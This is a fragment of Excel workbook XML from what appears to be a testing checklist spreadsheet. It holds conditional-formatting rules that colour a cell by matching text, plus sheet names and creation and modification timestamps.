                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="2" operator="containsText" id="{7D97EC64-AB73-426D-91EC-C290BDC1BE8F}">
            <xm:f>NOT(ISERROR(SEARCH($A$139,E80)))</xm:f>
            <xm:f>$A$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="3" operator="containsText" id="{3AD8F7E9-1943-4611-A1B2-C06790A5D4E3}">
            <xm:f>NOT(ISERROR(SEARCH($A$138,E80)))</xm:f>
            <xm:f>$A$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="4" operator="containsText" id="{81A10499-B6AF-47BD-812E-9E98C2DF69EA}">
            <xm:f>NOT(ISERROR(SEARCH($A$137,E80)))</xm:f>
            <xm:f>$A$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E80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Testing Checklist</vt:lpstr>
      <vt:lpstr>result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1996-10-14T23:33:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-26T09:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>